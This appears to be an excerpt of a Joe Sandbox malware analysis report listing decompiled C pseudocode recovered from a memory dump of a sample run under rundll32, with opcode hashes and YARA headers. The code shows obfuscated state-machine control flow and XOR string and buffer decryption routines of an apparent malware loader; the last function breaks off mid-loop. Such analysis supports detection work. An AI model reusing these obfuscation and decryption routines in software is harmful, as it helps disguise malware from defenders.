                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 6]
                                                                                                                    • API String ID: 0-3974934468
                                                                                                                    • Opcode ID: 02ce66d0ac1312b45417b61cb3151e0e53b916cf6161079afb78e77aaf59e863
                                                                                                                    • Instruction ID: e389d8e1f07b4c904c5439f0a2f7f34d57d2486b58a97672796d6c5452907de7
                                                                                                                    • Opcode Fuzzy Hash: 02ce66d0ac1312b45417b61cb3151e0e53b916cf6161079afb78e77aaf59e863
                                                                                                                    • Instruction Fuzzy Hash: B2712071508341AFC359CF25C88941BFBE5FBC9758F504A1DF6969A260C372DA498F43
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 91%
                                                                                                                    			E00335361(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                    				unsigned int _v4;
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				unsigned int _v32;
                                                                                                                    				void* __edx;
                                                                                                                    				void* _t84;
                                                                                                                    				void* _t104;
                                                                                                                    				void* _t118;
                                                                                                                    				signed int _t120;
                                                                                                                    				signed int _t121;
                                                                                                                    				signed int _t122;
                                                                                                                    				void* _t124;
                                                                                                                    				signed int* _t127;
                                                                                                                    
                                                                                                                    				_push(_a12);
                                                                                                                    				_push(_a8);
                                                                                                                    				_push(_a4);
                                                                                                                    				E003420B9(_t84);
                                                                                                                    				_v4 = 0x18047d;
                                                                                                                    				_t127 =  &(( &_v32)[5]);
                                                                                                                    				_v4 = _v4 >> 0xa;
                                                                                                                    				_v4 = _v4 ^ 0x000d3248;
                                                                                                                    				_t124 = 0;
                                                                                                                    				_v28 = 0x90acd4;
                                                                                                                    				_t104 = 0x35df4ed;
                                                                                                                    				_v28 = _v28 >> 5;
                                                                                                                    				_v28 = _v28 + 0xffff3107;
                                                                                                                    				_v28 = _v28 | 0xd0f9b279;
                                                                                                                    				_v28 = _v28 ^ 0xd0f1daef;
                                                                                                                    				_v8 = 0x9d14b7;
                                                                                                                    				_v8 = _v8 << 2;
                                                                                                                    				_v8 = _v8 ^ 0x027823b1;
                                                                                                                    				_v32 = 0xfd6947;
                                                                                                                    				_v32 = _v32 + 0xffff03bf;
                                                                                                                    				_t120 = 0x72;
                                                                                                                    				_v32 = _v32 / _t120;
                                                                                                                    				_v32 = _v32 >> 0xa;
                                                                                                                    				_v32 = _v32 ^ 0x00066e44;
                                                                                                                    				_v16 = 0x111da;
                                                                                                                    				_v16 = _v16 ^ 0xdd7c73d4;
                                                                                                                    				_v16 = _v16 | 0x7d37165e;
                                                                                                                    				_v16 = _v16 ^ 0xfd769a76;
                                                                                                                    				_v12 = 0x2531de;
                                                                                                                    				_v12 = _v12 << 0xd;
                                                                                                                    				_v12 = _v12 ^ 0xa63e9142;
                                                                                                                    				_v20 = 0x6e0002;
                                                                                                                    				_v20 = _v20 >> 0xe;
                                                                                                                    				_t121 = 0xe;
                                                                                                                    				_v20 = _v20 / _t121;
                                                                                                                    				_t122 = 0x3d;
                                                                                                                    				_v20 = _v20 * 0x64;
                                                                                                                    				_v20 = _v20 ^ 0x000bef19;
                                                                                                                    				_v24 = 0xa3fc95;
                                                                                                                    				_v24 = _v24 + 0xdcd1;
                                                                                                                    				_v24 = _v24 << 3;
                                                                                                                    				_v24 = _v24 / _t122;
                                                                                                                    				_v24 = _v24 ^ 0x0013a2ec;
                                                                                                                    				while(_t104 != 0x311781) {
                                                                                                                    					if(_t104 == 0x35df4ed) {
                                                                                                                    						_push(_t104);
                                                                                                                    						_push(_t104);
                                                                                                                    						_t118 = 0x28;
                                                                                                                    						 *0x353e08 = E00337FF2(_t118);
                                                                                                                    						_t104 = 0x605992c;
                                                                                                                    						continue;
                                                                                                                    					} else {
                                                                                                                    						if(_t104 == 0x477ef52) {
                                                                                                                    							E0033924B();
                                                                                                                    							_t104 = 0x311781;
                                                                                                                    							continue;
                                                                                                                    						} else {
                                                                                                                    							if(_t104 == 0x605992c) {
                                                                                                                    								if(E00350F33() != 0) {
                                                                                                                    									_t104 = 0xdb1ba22;
                                                                                                                    									continue;
                                                                                                                    								}
                                                                                                                    							} else {
                                                                                                                    								if(_t104 != 0xdb1ba22) {
                                                                                                                    									L13:
                                                                                                                    									if(_t104 != 0x5723dc8) {
                                                                                                                    										continue;
                                                                                                                    									}
                                                                                                                    								} else {
                                                                                                                    									_t124 = E0033960D(_v16, _a12, _a8, _v12);
                                                                                                                    									_t127 =  &(_t127[3]);
                                                                                                                    									if(_t124 == 0) {
                                                                                                                    										_t104 = 0x477ef52;
                                                                                                                    										continue;
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					return _t124;
                                                                                                                    				}
                                                                                                                    				E00348519(_v20, _v24,  *0x353e08);
                                                                                                                    				_t104 = 0x5723dc8;
                                                                                                                    				goto L13;
                                                                                                                    			}





















                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: H2
                                                                                                                    • API String ID: 0-302591398
                                                                                                                    • Opcode ID: f3b1d75f0c4744326101b2b5548e9940fb0c2db1ee26c5dda9ec5a54711b03fb
                                                                                                                    • Instruction ID: 3551d5c65ea66a76a806127bf497559fd84c2153cdd79f9dc9ccddd575c3e422
                                                                                                                    • Opcode Fuzzy Hash: f3b1d75f0c4744326101b2b5548e9940fb0c2db1ee26c5dda9ec5a54711b03fb
                                                                                                                    • Instruction Fuzzy Hash: 1B41C0726083019FC729CF26E48641FBBE1FBD8758F144A1DF5865A220D7B0DA88CB83
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 89%
                                                                                                                    			E00338B3D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                    				char _v44;
                                                                                                                    				signed int _v48;
                                                                                                                    				signed int _v52;
                                                                                                                    				signed int _v56;
                                                                                                                    				signed int _v60;
                                                                                                                    				signed int _v64;
                                                                                                                    				signed int _v68;
                                                                                                                    				signed int _v72;
                                                                                                                    				signed int _v76;
                                                                                                                    				signed int _v80;
                                                                                                                    				void* _t83;
                                                                                                                    				void* _t89;
                                                                                                                    				signed int _t93;
                                                                                                                    				void* _t96;
                                                                                                                    				void* _t108;
                                                                                                                    				void* _t109;
                                                                                                                    				void* _t111;
                                                                                                                    				void* _t112;
                                                                                                                    
                                                                                                                    				_push(_a16);
                                                                                                                    				_t108 = __ecx;
                                                                                                                    				_push(_a12);
                                                                                                                    				_push(_a8);
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__edx);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E003420B9(_t83);
                                                                                                                    				_v72 = 0xbb1237;
                                                                                                                    				_t112 = _t111 + 0x18;
                                                                                                                    				_v72 = _v72 >> 0xf;
                                                                                                                    				_v72 = _v72 + 0xd544;
                                                                                                                    				_t109 = 0;
                                                                                                                    				_v72 = _v72 ^ 0x000eb3e9;
                                                                                                                    				_t96 = 0x815a082;
                                                                                                                    				_v48 = 0x50cb35;
                                                                                                                    				_v48 = _v48 + 0xffff87ec;
                                                                                                                    				_v48 = _v48 ^ 0x00585237;
                                                                                                                    				_v52 = 0xa4cd83;
                                                                                                                    				_v52 = _v52 ^ 0x5b114d95;
                                                                                                                    				_v52 = _v52 ^ 0x5bb6524d;
                                                                                                                    				_v56 = 0xbe8ecf;
                                                                                                                    				_v56 = _v56 << 0xe;
                                                                                                                    				_v56 = _v56 ^ 0xa3b0842f;
                                                                                                                    				_v60 = 0x771210;
                                                                                                                    				_v60 = _v60 | 0x3e44f288;
                                                                                                                    				_v60 = _v60 ^ 0x3e758d5b;
                                                                                                                    				_v80 = 0xf3b10d;
                                                                                                                    				_v80 = _v80 ^ 0x3cb59f0c;
                                                                                                                    				_v80 = _v80 >> 4;
                                                                                                                    				_v80 = _v80 + 0xffffd90b;
                                                                                                                    				_v80 = _v80 ^ 0x03c55d5e;
                                                                                                                    				_v64 = 0x352515;
                                                                                                                    				_v64 = _v64 ^ 0x7339bda5;
                                                                                                                    				_v64 = _v64 + 0x1326;
                                                                                                                    				_v64 = _v64 ^ 0x7306d08c;
                                                                                                                    				_v68 = 0x4f62f3;
                                                                                                                    				_v68 = _v68 << 0xd;
                                                                                                                    				_v68 = _v68 ^ 0x83faab25;
                                                                                                                    				_v68 = _v68 ^ 0x6fa8977d;
                                                                                                                    				_v76 = 0x2ac691;
                                                                                                                    				_v76 = _v76 << 9;
                                                                                                                    				_t93 = 0x6b;
                                                                                                                    				_v76 = _v76 / _t93;
                                                                                                                    				_v76 = _v76 << 0xc;
                                                                                                                    				_v76 = _v76 ^ 0xcae566b9;
                                                                                                                    				do {
                                                                                                                    					while(_t96 != 0x54856a9) {
                                                                                                                    						if(_t96 == 0x815a082) {
                                                                                                                    							_t96 = 0x54856a9;
                                                                                                                    							continue;
                                                                                                                    						} else {
                                                                                                                    							if(_t96 == 0xa9da54a) {
                                                                                                                    								_t89 = E0034D97D( &_v44, _v56, __eflags, _v60, _t108 + 0x18, _v80);
                                                                                                                    								_t112 = _t112 + 0xc;
                                                                                                                    								__eflags = _t89;
                                                                                                                    								if(__eflags != 0) {
                                                                                                                    									_t96 = 0xefea9c1;
                                                                                                                    									continue;
                                                                                                                    								}
                                                                                                                    							} else {
                                                                                                                    								_t118 = _t96 - 0xefea9c1;
                                                                                                                    								if(_t96 != 0xefea9c1) {
                                                                                                                    									goto L11;
                                                                                                                    								} else {
                                                                                                                    									E0034D97D( &_v44, _v64, _t118, _v68, _t108 + 0xc, _v76);
                                                                                                                    									_t109 =  !=  ? 1 : _t109;
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						L6:
                                                                                                                    						return _t109;
                                                                                                                    					}
                                                                                                                    					E00333DBC( &_v44, _a8, _v72, _v48, _v52);
                                                                                                                    					_t112 = _t112 + 0xc;
                                                                                                                    					_t96 = 0xa9da54a;
                                                                                                                    					L11:
                                                                                                                    					__eflags = _t96 - 0x309e957;
                                                                                                                    				} while (__eflags != 0);
                                                                                                                    				goto L6;
                                                                                                                    			}





















                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 7RX
                                                                                                                    • API String ID: 0-861457431
                                                                                                                    • Opcode ID: 22ac0985efce6a924f31ebd31ed7415f32b1f56f57cf5f3da1b1feb7b99d064e
                                                                                                                    • Instruction ID: 4be2aad4aecbbd3f6732231332ee29ecdca16cd3c0e3b65c48136b14a944ce04
                                                                                                                    • Opcode Fuzzy Hash: 22ac0985efce6a924f31ebd31ed7415f32b1f56f57cf5f3da1b1feb7b99d064e
                                                                                                                    • Instruction Fuzzy Hash: CF4155B1109701DBCB968F21848982FBBE1FFC4B88F501A2DF59696220D7718A598F97
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 89%
                                                                                                                    			E00347BA6(signed int* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8) {
                                                                                                                    				intOrPtr _v4;
                                                                                                                    				intOrPtr _v8;
                                                                                                                    				intOrPtr _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				void* _t53;
                                                                                                                    				signed int _t60;
                                                                                                                    				signed int _t67;
                                                                                                                    				unsigned int _t71;
                                                                                                                    				signed int _t74;
                                                                                                                    				signed int _t76;
                                                                                                                    				signed int _t77;
                                                                                                                    				void* _t85;
                                                                                                                    				signed int _t92;
                                                                                                                    				void* _t98;
                                                                                                                    				intOrPtr _t99;
                                                                                                                    				signed int* _t100;
                                                                                                                    				signed int* _t101;
                                                                                                                    				signed int* _t102;
                                                                                                                    
                                                                                                                    				_t100 = _a8;
                                                                                                                    				_t102 = __ecx;
                                                                                                                    				_push(_t100);
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__edx);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E003420B9(_t53);
                                                                                                                    				_v12 = 0x7b3704;
                                                                                                                    				_t99 = 0;
                                                                                                                    				_v8 = 0x80915f;
                                                                                                                    				_v4 = 0;
                                                                                                                    				_v24 = 0xa71362;
                                                                                                                    				_v24 = _v24 << 0xb;
                                                                                                                    				_v24 = _v24 + 0x3e5;
                                                                                                                    				_v24 = _v24 ^ 0x3895df4e;
                                                                                                                    				_v28 = 0xc4b4e;
                                                                                                                    				_t76 = 0x2f;
                                                                                                                    				_v28 = _v28 * 0x14;
                                                                                                                    				_v28 = _v28 | 0x55175d82;
                                                                                                                    				_v28 = _v28 ^ 0x65144985;
                                                                                                                    				_v28 = _v28 ^ 0x30e15ded;
                                                                                                                    				_a8 = 0x3b45b7;
                                                                                                                    				_a8 = _a8 / _t76;
                                                                                                                    				_a8 = _a8 << 4;
                                                                                                                    				_t77 = 0x6c;
                                                                                                                    				_a8 = _a8 / _t77;
                                                                                                                    				_a8 = _a8 ^ 0x000cc8ea;
                                                                                                                    				_t60 =  *_t100;
                                                                                                                    				_t101 =  &(_t100[2]);
                                                                                                                    				_t92 = _t100[1] ^ _t60;
                                                                                                                    				_v20 = _t60;
                                                                                                                    				_v16 = _t92;
                                                                                                                    				_t71 =  !=  ? (_t92 & 0xfffffffc) + 4 : _t92;
                                                                                                                    				_t67 = E00337FF2(_t71);
                                                                                                                    				_a8 = _t67;
                                                                                                                    				if(_t67 != 0) {
                                                                                                                    					_t98 =  >  ? 0 :  &(_t101[_t71 >> 2]) - _t101 + 3 >> 2;
                                                                                                                    					if(_t98 != 0) {
                                                                                                                    						_t74 = _v20;
                                                                                                                    						_t85 = _t67 - _t101;
                                                                                                                    						do {
                                                                                                                    							_t99 = _t99 + 1;
                                                                                                                    							 *(_t85 + _t101) =  *_t101 ^ _t74;
                                                                                                                    							_t101 =  &(_t101[1]);
                                                                                                                    						} while (_t99 < _t98);
                                                                                                                    						_t67 = _a8;
                                                                                                                    					}
                                                                                                                    					if(_t102 != 0) {
                                                                                                                    						 *_t102 = _v16;
                                                                                                                    						return _t67;
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    				return _t67;
                                                                                                                    			}

























                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: ]0
                                                                                                                    • API String ID: 0-3096761382
                                                                                                                    • Opcode ID: f410119f50637a55b7532a698d6b681cf897767909917c4c835d32da9b826f29
                                                                                                                    • Instruction ID: 6b0cdc4e53d5e04f3971ad0143b6a3ac5fb01def471c097bf100de2e935669fb
                                                                                                                    • Opcode Fuzzy Hash: f410119f50637a55b7532a698d6b681cf897767909917c4c835d32da9b826f29
                                                                                                                    • Instruction Fuzzy Hash: 743175726093008FD318CF29C88594BFBE6FBC9708F508A2EF58997251DBB5ED058B56
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 83%
                                                                                                                    			E00333C3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				signed int _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				signed int _v44;
                                                                                                                    				char _v564;
                                                                                                                    				void* _t97;
                                                                                                                    				signed int _t114;
                                                                                                                    				signed int _t115;
                                                                                                                    				signed int _t116;
                                                                                                                    
                                                                                                                    				_push(_a12);
                                                                                                                    				_push(_a8);
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__edx);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E003420B9(_t97);
                                                                                                                    				_v32 = 0xf161c0;
                                                                                                                    				_v32 = _v32 + 0xffff8ad4;
                                                                                                                    				_v32 = _v32 ^ 0x00fbd9a3;
                                                                                                                    				_v28 = 0xfc9039;
                                                                                                                    				_t114 = 0x1b;
                                                                                                                    				_v28 = _v28 / _t114;
                                                                                                                    				_t115 = 5;
                                                                                                                    				_v28 = _v28 * 0x6e;
                                                                                                                    				_v28 = _v28 ^ 0x040e4771;
                                                                                                                    				_v44 = 0x2ba482;
                                                                                                                    				_v44 = _v44 | 0x0543644d;
                                                                                                                    				_v44 = _v44 ^ 0x0568ae00;
                                                                                                                    				_v36 = 0xddb19;
                                                                                                                    				_t116 = 0x23;
                                                                                                                    				_v36 = _v36 / _t115;
                                                                                                                    				_v36 = _v36 ^ 0x000396ce;
                                                                                                                    				_v8 = 0xc420c0;
                                                                                                                    				_v8 = _v8 >> 8;
                                                                                                                    				_v8 = _v8 + 0xffff6316;
                                                                                                                    				_v8 = _v8 * 0x7a;
                                                                                                                    				_v8 = _v8 ^ 0x001ea2c5;
                                                                                                                    				_v12 = 0xb92025;
                                                                                                                    				_v12 = _v12 >> 3;
                                                                                                                    				_v12 = _v12 + 0xfe32;
                                                                                                                    				_v12 = _v12 << 0xe;
                                                                                                                    				_v12 = _v12 ^ 0x088e8322;
                                                                                                                    				_v24 = 0x144a1a;
                                                                                                                    				_v24 = _v24 + 0xffffa246;
                                                                                                                    				_v24 = _v24 + 0xffff01e3;
                                                                                                                    				_v24 = _v24 ^ 0x001122d6;
                                                                                                                    				_v16 = 0x7d3361;
                                                                                                                    				_v16 = _v16 / _t116;
                                                                                                                    				_v16 = _v16 << 4;
                                                                                                                    				_v16 = _v16 >> 9;
                                                                                                                    				_v16 = _v16 ^ 0x00004840;
                                                                                                                    				_v20 = 0xb3d6e6;
                                                                                                                    				_v20 = _v20 ^ 0x61ac6c83;
                                                                                                                    				_v20 = _v20 ^ 0xeb92407c;
                                                                                                                    				_v20 = _v20 ^ 0x8a8fe9bf;
                                                                                                                    				_v40 = 0xbcf254;
                                                                                                                    				_v40 = _v40 << 0xc;
                                                                                                                    				_v40 = _v40 ^ 0xcf275652;
                                                                                                                    				_push(_v44);
                                                                                                                    				_push(_v28);
                                                                                                                    				E0033A918(_a4, _v40, _v36, _v8, E0034DCF7(_v32, 0x3317c0, _v40), _v12,  &_v564);
                                                                                                                    				E0033A8B0(_v24, _t107, _v16);
                                                                                                                    				return E00341F8A(_v20, _v40,  &_v564);
                                                                                                                    			}



















                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: a3}
                                                                                                                    • API String ID: 0-1821053108
                                                                                                                    • Opcode ID: f0e164c7d3d3718b305136b2b461c08cb3ee3854ff0f50365b9f548e75653f48
                                                                                                                    • Instruction ID: 5f1faa5e7f7a3088cfb3703ab4aabd04a31e99062aedbb9b4bcc4d9845ba1ce6
                                                                                                                    • Opcode Fuzzy Hash: f0e164c7d3d3718b305136b2b461c08cb3ee3854ff0f50365b9f548e75653f48
                                                                                                                    • Instruction Fuzzy Hash: 4D41F271D0020AEBCF09CFE0D94A5EEBBB2FB44314F208199E510BA260D7B55B55DFA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 89%
                                                                                                                    			E00348606(void* __ecx, signed int* __edx, void* __eflags) {
                                                                                                                    				void* _t46;
                                                                                                                    				signed int _t50;
                                                                                                                    				unsigned int* _t63;
                                                                                                                    				signed int _t64;
                                                                                                                    				signed int _t66;
                                                                                                                    				signed int _t72;
                                                                                                                    				unsigned int _t73;
                                                                                                                    				unsigned int _t74;
                                                                                                                    				unsigned int* _t78;
                                                                                                                    				signed int* _t79;
                                                                                                                    				signed int* _t80;
                                                                                                                    				unsigned int _t82;
                                                                                                                    				void* _t88;
                                                                                                                    				void* _t90;
                                                                                                                    				void* _t92;
                                                                                                                    				void* _t93;
                                                                                                                    
                                                                                                                    				_push( *(_t92 + 0x2c));
                                                                                                                    				_push( *(_t92 + 0x2c));
                                                                                                                    				_push( *(_t92 + 0x2c));
                                                                                                                    				_push(__edx);
                                                                                                                    				E003420B9(_t46);
                                                                                                                    				 *(_t92 + 0x20) = 0xe2d3c4;
                                                                                                                    				_t79 =  &(__edx[1]);
                                                                                                                    				 *(_t92 + 0x20) =  *(_t92 + 0x20) + 0xa17d;
                                                                                                                    				 *(_t92 + 0x20) =  *(_t92 + 0x20) << 0x10;
                                                                                                                    				 *(_t92 + 0x20) =  *(_t92 + 0x20) ^ 0xc7a816b6;
                                                                                                                    				 *(_t92 + 0x20) =  *(_t92 + 0x20) ^ 0xb2e477eb;
                                                                                                                    				 *(_t92 + 0x28) = 0xf8496b;
                                                                                                                    				 *(_t92 + 0x28) =  *(_t92 + 0x28) >> 0xa;
                                                                                                                    				 *(_t92 + 0x28) =  *(_t92 + 0x28) * 0x37;
                                                                                                                    				 *(_t92 + 0x28) =  *(_t92 + 0x28) ^ 0x0006b61c;
                                                                                                                    				 *(_t92 + 0x24) = 0x2326e4;
                                                                                                                    				 *(_t92 + 0x24) =  *(_t92 + 0x24) | 0x0bc2d168;
                                                                                                                    				 *(_t92 + 0x24) =  *(_t92 + 0x24) << 4;
                                                                                                                    				 *(_t92 + 0x24) =  *(_t92 + 0x24) ^ 0xbe3c76f1;
                                                                                                                    				_t66 =  *__edx;
                                                                                                                    				_t80 =  &(_t79[1]);
                                                                                                                    				_t50 =  *_t79 ^ _t66;
                                                                                                                    				 *(_t92 + 0x2c) = _t66;
                                                                                                                    				 *(_t92 + 0x30) = _t50;
                                                                                                                    				_t30 = _t50 + 1; // 0xb
                                                                                                                    				_t82 =  !=  ? (_t30 & 0xfffffffc) + 4 : _t30;
                                                                                                                    				_t93 = _t92 + 0xc;
                                                                                                                    				_t63 = E00337FF2(_t82);
                                                                                                                    				 *(_t93 + 0x1c) = _t63;
                                                                                                                    				if(_t63 != 0) {
                                                                                                                    					_t90 = 0;
                                                                                                                    					_t78 = _t63;
                                                                                                                    					_t88 =  >  ? 0 :  &(_t80[_t82 >> 2]) - _t80 + 3 >> 2;
                                                                                                                    					if(_t88 != 0) {
                                                                                                                    						_t64 =  *(_t93 + 0x1c);
                                                                                                                    						do {
                                                                                                                    							_t72 =  *_t80;
                                                                                                                    							_t80 =  &(_t80[1]);
                                                                                                                    							_t73 = _t72 ^ _t64;
                                                                                                                    							 *_t78 = _t73;
                                                                                                                    							_t78 =  &(_t78[1]);
                                                                                                                    							_t74 = _t73 >> 0x10;
                                                                                                                    							 *((char*)(_t78 - 3)) = _t73 >> 8;
                                                                                                                    							 *(_t78 - 2) = _t74;
                                                                                                                    							_t90 = _t90 + 1;
                                                                                                                    							 *((char*)(_t78 - 1)) = _t74 >> 8;
                                                                                                                    						} while (_t90 < _t88);
                                                                                                                    						_t63 =  *(_t93 + 0x18);
                                                                                                                    					}
                                                                                                                    					 *((char*)(_t63 +  *((intOrPtr*)(_t93 + 0x20)))) = 0;
                                                                                                                    				}
                                                                                                                    				return _t63;
                                                                                                                    			}




















                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: &#
                                                                                                                    • API String ID: 0-2240308938
                                                                                                                    • Opcode ID: 7b9ad6a671dc95800b82af0f3d55b183cd0e6387ee121b23275acf08ce764799
                                                                                                                    • Instruction ID: c71dff247012136b8ff4c60dcdc8ceae2ffd20a21566f3c76537882e8365d435
                                                                                                                    • Opcode Fuzzy Hash: 7b9ad6a671dc95800b82af0f3d55b183cd0e6387ee121b23275acf08ce764799
                                                                                                                    • Instruction Fuzzy Hash: 92316C726083518FC305DF28C48581BFBE0FF98718F054B6DE889AB211D774EA09CB96
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 91%
                                                                                                                    			E0034DCF7(void* __ecx, signed int* __edx, void* __eflags) {
                                                                                                                    				void* _t39;
                                                                                                                    				signed int _t43;
                                                                                                                    				signed int _t60;
                                                                                                                    				signed int _t61;
                                                                                                                    				signed int _t63;
                                                                                                                    				signed int _t70;
                                                                                                                    				unsigned int _t71;
                                                                                                                    				unsigned int _t72;
                                                                                                                    				signed int _t76;
                                                                                                                    				signed int* _t77;
                                                                                                                    				signed int* _t78;
                                                                                                                    				unsigned int _t80;
                                                                                                                    				void* _t86;
                                                                                                                    				short _t88;
                                                                                                                    				void* _t90;
                                                                                                                    				void* _t91;
                                                                                                                    
                                                                                                                    				_push( *(_t90 + 0x28));
                                                                                                                    				_push( *(_t90 + 0x28));
                                                                                                                    				_push(__edx);
                                                                                                                    				E003420B9(_t39);
                                                                                                                    				 *(_t90 + 0x24) = 0xf19f37;
                                                                                                                    				_t77 =  &(__edx[1]);
                                                                                                                    				 *(_t90 + 0x24) =  *(_t90 + 0x24) * 0x42;
                                                                                                                    				 *(_t90 + 0x24) =  *(_t90 + 0x24) ^ 0x3e4cf98f;
                                                                                                                    				 *(_t90 + 0x20) = 0xb1a340;
                                                                                                                    				 *(_t90 + 0x20) =  *(_t90 + 0x20) + 0xbcd0;
                                                                                                                    				 *(_t90 + 0x20) =  *(_t90 + 0x20) ^ 0x00b2d2cb;
                                                                                                                    				 *(_t90 + 0x1c) = 0x9743e1;
                                                                                                                    				 *(_t90 + 0x1c) =  *(_t90 + 0x1c) | 0x457c67e3;
                                                                                                                    				 *(_t90 + 0x1c) =  *(_t90 + 0x1c) ^ 0x45f711d7;
                                                                                                                    				_t63 =  *__edx;
                                                                                                                    				_t78 =  &(_t77[1]);
                                                                                                                    				_t43 =  *_t77 ^ _t63;
                                                                                                                    				 *(_t90 + 0x28) = _t63;
                                                                                                                    				 *(_t90 + 0x2c) = _t43;
                                                                                                                    				_t21 = _t43 + 1; // 0xf19f38
                                                                                                                    				_t80 =  !=  ? (_t21 & 0xfffffffc) + 4 : _t21;
                                                                                                                    				_t91 = _t90 + 8;
                                                                                                                    				_t60 = E00337FF2(_t80 + _t80);
                                                                                                                    				 *(_t91 + 0x1c) = _t60;
                                                                                                                    				if(_t60 != 0) {
                                                                                                                    					_t88 = 0;
                                                                                                                    					_t76 = _t60;
                                                                                                                    					_t86 =  >  ? 0 :  &(_t78[_t80 >> 2]) - _t78 + 3 >> 2;
                                                                                                                    					if(_t86 != 0) {
                                                                                                                    						_t61 =  *(_t91 + 0x1c);
                                                                                                                    						do {
                                                                                                                    							_t70 =  *_t78;
                                                                                                                    							_t78 =  &(_t78[1]);
                                                                                                                    							_t71 = _t70 ^ _t61;
                                                                                                                    							 *_t76 = _t71 & 0x000000ff;
                                                                                                                    							_t76 = _t76 + 8;
                                                                                                                    							 *((short*)(_t76 - 6)) = _t71 >> 0x00000008 & 0x000000ff;
                                                                                                                    							_t72 = _t71 >> 0x10;
                                                                                                                    							_t88 = _t88 + 1;
